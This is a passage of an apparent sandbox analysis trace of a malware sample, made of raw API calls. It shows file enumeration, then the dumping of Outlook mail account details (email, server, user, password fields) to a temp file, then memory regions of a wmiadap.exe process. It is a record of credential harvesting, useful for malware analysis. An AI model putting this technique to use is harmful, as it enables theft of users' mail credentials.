lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] strlen (_Str="tUZIMiW1fowTB.mp4") returned 0x11 [0138.674] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] strlen (_Str="wEI8Jype31Y2tUcLqG.avi") returned 0x16 [0138.674] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] strlen (_Str="Z6CamFmXK P.mkv") returned 0xf [0138.674] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] strlen (_Str="ZdQ Yjy.m4a") returned 0xb [0138.674] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0138.674] FindClose (in: hFindFile=0x5beab8 | out: hFindFile=0x5beab8) returned 1 [0138.674] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.674] strlen (_Str="") returned 0x0 [0138.674] strlen (_Str="oRdd0f6_30Do2avz0Da.swf") returned 0x17 [0138.674] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.674] strlen (_Str="") returned 0x0 [0138.674] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.674] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.674] strlen (_Str="") returned 0x0 [0138.674] strlen (_Str="order ref ftp.exe") returned 0x11 [0138.674] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.674] strlen (_Str="") returned 0x0 [0138.674] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="p72mwNsoaskX8JFjLk6c.wav") returned 0x18 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="P_KHZ.m4a") returned 0x9 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="rH4AI2hPInY i8W-HJ_.jpg") returned 0x17 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="TTh5.mp4") returned 0x8 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="ujeLA3jz.ots") returned 0xc [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="uNcEfcoR9kX7P2n8N.ods") returned 0x15 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="vq9xg.swf") returned 0x9 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.675] strlen (_Str="") returned 0x0 [0138.675] strlen (_Str="XWAB.gif") returned 0x8 [0138.675] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] strlen (_Str="") returned 0x0 [0138.675] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.675] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0 [0138.675] FindClose (in: hFindFile=0x5bea38 | out: hFindFile=0x5bea38) returned 1 [0138.675] _strcmpi (_Str1="/nosort", _Str2="/stext") returned -1 [0138.675] _strcmpi (_Str1="/nosort", _Str2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp") returned -1 [0138.675] qsort (in: _Base=0x1cb8468, _NumOfElements=0x1, _SizeOfElements=0x3a4, _PtFuncCompare=0x40a25d | out: _Base=0x1cb8468) [0138.675] SetCursor (hCursor=0x10007) returned 0x10007 [0138.676] CreateFileA (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp53a0.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0138.676] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0138.676] SetCursor (hCursor=0x10007) returned 0x10007 [0138.676] strlen (_Str="==================================================") returned 0x32 [0138.676] WriteFile (in: hFile=0x1b8, lpBuffer=0x19f944*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x19f91c, lpOverlapped=0x0 | out: lpBuffer=0x19f944*, lpNumberOfBytesWritten=0x19f91c*=0x32, lpOverlapped=0x0) returned 1 [0138.677] strlen (_Str="\r\n") returned 0x2 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x413b1c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f914, lpOverlapped=0x0 | out: lpBuffer=0x413b1c*, lpNumberOfBytesWritten=0x19f914*=0x2, lpOverlapped=0x0) returned 1 [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Name : dkdjf kdil\r\n") returned 32 [0138.677] strlen (_Str="Name : dkdjf kdil\r\n") returned 0x20 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x20, lpOverlapped=0x0) returned 1 [0138.677] LoadStringA (in: hInstance=0x400000, uID=0x394, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="Outlook 2016") returned 0xc [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Application : Outlook 2016\r\n") returned 34 [0138.677] strlen (_Str="Application : Outlook 2016\r\n") returned 0x22 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x22, lpOverlapped=0x0) returned 1 [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Email : lcfkj@kiekc.df\r\n") returned 36 [0138.677] strlen (_Str="Email : lcfkj@kiekc.df\r\n") returned 0x24 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x24, lpOverlapped=0x0) returned 1 [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Server : fgr\r\n") returned 25 [0138.677] strlen (_Str="Server : fgr\r\n") returned 0x19 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x19, lpOverlapped=0x0) returned 1 [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Server Port : \r\n") returned 22 [0138.677] strlen (_Str="Server Port : \r\n") returned 0x16 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x16, lpOverlapped=0x0) returned 1 [0138.677] LoadStringA (in: hInstance=0x400000, uID=0x10, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="No") returned 0x2 [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Secured : No\r\n") returned 24 [0138.677] strlen (_Str="Secured : No\r\n") returned 0x18 [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x18, lpOverlapped=0x0) returned 1 [0138.677] LoadStringA (in: hInstance=0x400000, uID=0x321, lpBuffer=0x8ac770, cchBufferMax=4095 | out: lpBuffer="POP3") returned 0x4 [0138.677] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Type : POP3\r\n") returned 26 [0138.677] strlen (_Str="Type : POP3\r\n") returned 0x1a [0138.677] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x1a, lpOverlapped=0x0) returned 1 [0138.678] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="User : lcfkj@kiekc.df\r\n") returned 36 [0138.678] strlen (_Str="User : lcfkj@kiekc.df\r\n") returned 0x24 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x24, lpOverlapped=0x0) returned 1 [0138.678] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Password : \r\n") returned 22 [0138.678] strlen (_Str="Password : \r\n") returned 0x16 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x16, lpOverlapped=0x0) returned 1 [0138.678] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Profile : Outlook\r\n") returned 29 [0138.678] strlen (_Str="Profile : Outlook\r\n") returned 0x1d [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x1d, lpOverlapped=0x0) returned 1 [0138.678] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="Password Strength : \r\n") returned 22 [0138.678] strlen (_Str="Password Strength : \r\n") returned 0x16 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x16, lpOverlapped=0x0) returned 1 [0138.678] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="SMTP Server : rgdr\r\n") returned 26 [0138.678] strlen (_Str="SMTP Server : rgdr\r\n") returned 0x1a [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x1a, lpOverlapped=0x0) returned 1 [0138.678] sprintf (in: _Dest=0x1cb2150, _Format="%-18s: %s\r\n" | out: _Dest="SMTP Server Port : \r\n") returned 22 [0138.678] strlen (_Str="SMTP Server Port : \r\n") returned 0x16 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x1cb2150*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x1cb2150*, lpNumberOfBytesWritten=0x19f918*=0x16, lpOverlapped=0x0) returned 1 [0138.678] strlen (_Str="==================================================") returned 0x32 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x19f944*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x19f928, lpOverlapped=0x0 | out: lpBuffer=0x19f944*, lpNumberOfBytesWritten=0x19f928*=0x32, lpOverlapped=0x0) returned 1 [0138.678] strlen (_Str="\r\n") returned 0x2 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x413b1c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f920, lpOverlapped=0x0 | out: lpBuffer=0x413b1c*, lpNumberOfBytesWritten=0x19f920*=0x2, lpOverlapped=0x0) returned 1 [0138.678] strlen (_Str="\r\n") returned 0x2 [0138.678] WriteFile (in: hFile=0x1b8, lpBuffer=0x413b1c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f918, lpOverlapped=0x0 | out: lpBuffer=0x413b1c*, lpNumberOfBytesWritten=0x19f918*=0x2, lpOverlapped=0x0) returned 1 [0138.678] CloseHandle (hObject=0x1b8) returned 1 [0138.679] SetCursor (hCursor=0x10007) returned 0x10007 [0138.679] DeleteObject (ho=0x750a06d6) returned 1 [0138.680] exit (_Code=0) Thread: id = 121 os_tid = 0x538 Process: id = "6" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x59c29000" os_pid = "0xce4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x318" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1323 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1324 start_va = 0x7860ed0000 end_va = 0x7860eeffff entry_point = 0x0 region_type = private name = "private_0x0000007860ed0000" filename = "" Region: id = 1325 start_va = 0x7860ef0000 end_va = 0x7860f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007860ef0000" filename = "" Region: id = 1326 start_va = 0x7860f10000 end_va = 0x7860f8ffff entry_point = 0x0 region_type = private name = "private_0x0000007860f10000" filename = "" Region: id = 1327 start_va = 0x7860f90000 end_va = 0x7860f93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007860f90000" filename = "" Region: id = 1328 start_va = 0x7860fa0000 end_va = 0x7860fa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007860fa0000" filename = "" Region: id = 1329 start_va = 0x7860fb0000 end_va = 0x7860fb1fff entry_point = 0x0 region_type = private name = "private_0x0000007860fb0000" filename = "" Region: id = 1330 start_va = 0x7df5ff120000 end_va = 0x7ff5ff11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff120000" filename = "" Region: id = 1331 start_va = 0x7ff79d2c0000 end_va = 0x7ff79d2e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79d2c0000" filename = "" Region: id = 1332 start_va = 0x7ff79d2ed000 end_va = 0x7ff79d2eefff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2ed000" filename = "" Region: id = 1333 start_va = 0x7ff79d2ef000 end_va = 0x7ff79d2effff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2ef000" filename = "" Region: id = 1334 start_va = 0x7ff79dac0000 end_va = 0x7ff79daeefff entry_point = 0x7ff79dac0000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 1335 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1336 start_va = 0x7861000000 end_va = 0x78610fffff entry_point = 0x0 region_type = private name = "private_0x0000007861000000" filename = "" Region: id = 1337 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1338 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1339 start_va = 0x7860ed0000 end_va = 0x7860edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007860ed0000" filename = "" Region: id = 1340 start_va = 0x7860ee0000 end_va = 0x7860ee6fff entry_point = 0x0 region_type = private name = "private_0x0000007860ee0000" filename = "" Region: id = 1341 start_va = 0x7860fc0000 end_va = 0x7860fc6fff entry_point = 0x0 region_type = private name = "private_0x0000007860fc0000" filename = "" Region: id = 1342 start_va = 0x7861100000 end_va = 0x78611bdfff entry_point = 0x7861100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1343 start_va = 0x78611c0000 end_va = 0x786123ffff entry_point = 0x0 region_type = private name = "private_0x00000078611c0000" filename = "" Region: id = 1344 start_va = 0x78612f0000 end_va = 0x78612fffff entry_point = 0x0 region_type = private name = "private_0x00000078612f0000" filename = "" Region: id = 1345 start_va = 0x7ff79d1c0000 end_va = 0x7ff79d2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79d1c0000" filename = "" Region: id = 1346 start_va = 0x7ff79d2eb000 end_va = 0x7ff79d2ecfff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2eb000" filename = "" Region: id = 1347 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1348 start_va = 0x7ffaf04d0000 end_va = 0x7ffaf04f4fff entry_point = 0x7ffaf04d0000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 1349 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1350 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1351 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1352 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1353 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1354 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1355 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1356 start_va = 0x7860fd0000 end_va = 0x7860fd0fff entry_point = 0x0 region_type = private name = "private_0x0000007860fd0000" filename = "" Region: id = 1357 start_va = 0x7860fe0000 end_va = 0x7860fe0fff entry_point = 0x0 region_type = private name = "private_0x0000007860fe0000" filename = "" Region: id = 1358 start_va = 0x7860ff0000 end_va = 0x7860ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007860ff0000" filename = "" Region: id = 1359 start_va = 0x7861240000 end_va = 0x78612bffff entry_point = 0x0 region_type = private name = "private_0x0000007861240000" filename = "" Region: id = 1360 start_va = 0x78612c0000 end_va = 0x78612c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000078612c0000" filename = "" Region: id = 1361 start_va = 0x7861300000 end_va = 0x7861487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007861300000" filename = "" Region: id = 1362 start_va = 0x7861490000 end_va = 0x7861610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007861490000" filename = "" Region: id = 1363 start_va = 0x7861620000 end_va = 0x78616dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007861620000" filename = "" Region: id = 1364 start_va = 0x78616e0000 end_va = 0x7861a16fff entry_point = 0x78616e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1365 start_va = 0x7861a20000 end_va = 0x7861a9ffff entry_point = 0x0 region_type = private name = "private_0x0000007861a20000" filename = "" Region: id = 1366 start_va = 0x7861aa0000 end_va = 0x7861b1ffff entry_point = 0x0 region_type = private name = "private_0x0000007861aa0000" filename = "" Region: id = 1367 start_va = 0x7861b20000 end_va = 0x7861b9ffff entry_point = 0x0 region_type = private name = "private_0x0000007861b20000" filename = "" Region: id = 1368 start_va = 0x7ff79d2e3000 end_va = 0x7ff79d2e4fff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2e3000" filename = "" Region: id = 1369 start_va = 0x7ff79d2e5000 end_va = 0x7ff79d2e6fff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2e5000" filename = "" Region: id = 1370 start_va = 0x7ff79d2e7000 end_va = 0x7ff79d2e8fff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2e7000" filename = "" Region: id = 1371 start_va = 0x7ff79d2e9000 end_va = 0x7ff79d2eafff entry_point = 0x0 region_type = private name = "private_0x00007ff79d2e9000" filename = "" Region: id = 1372 start_va = 